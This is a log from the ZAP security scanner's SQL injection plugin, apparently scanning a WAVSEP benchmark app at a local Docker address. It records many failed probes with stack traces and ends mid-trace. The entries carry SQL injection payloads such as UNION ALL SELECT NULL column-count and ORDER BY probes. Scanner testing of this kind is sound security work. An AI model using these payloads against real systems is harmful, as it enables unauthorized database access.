9681447 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681448 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681449 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681449 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://) ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681451 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) ORDER BY 1249#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://) ORDER BY 1249# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681451 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' ORDER BY 1885-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' ORDER BY 1885-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681451 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://) UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681452 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://) UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681453 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://) UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681454 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://) UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681455 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681455 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681455 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at 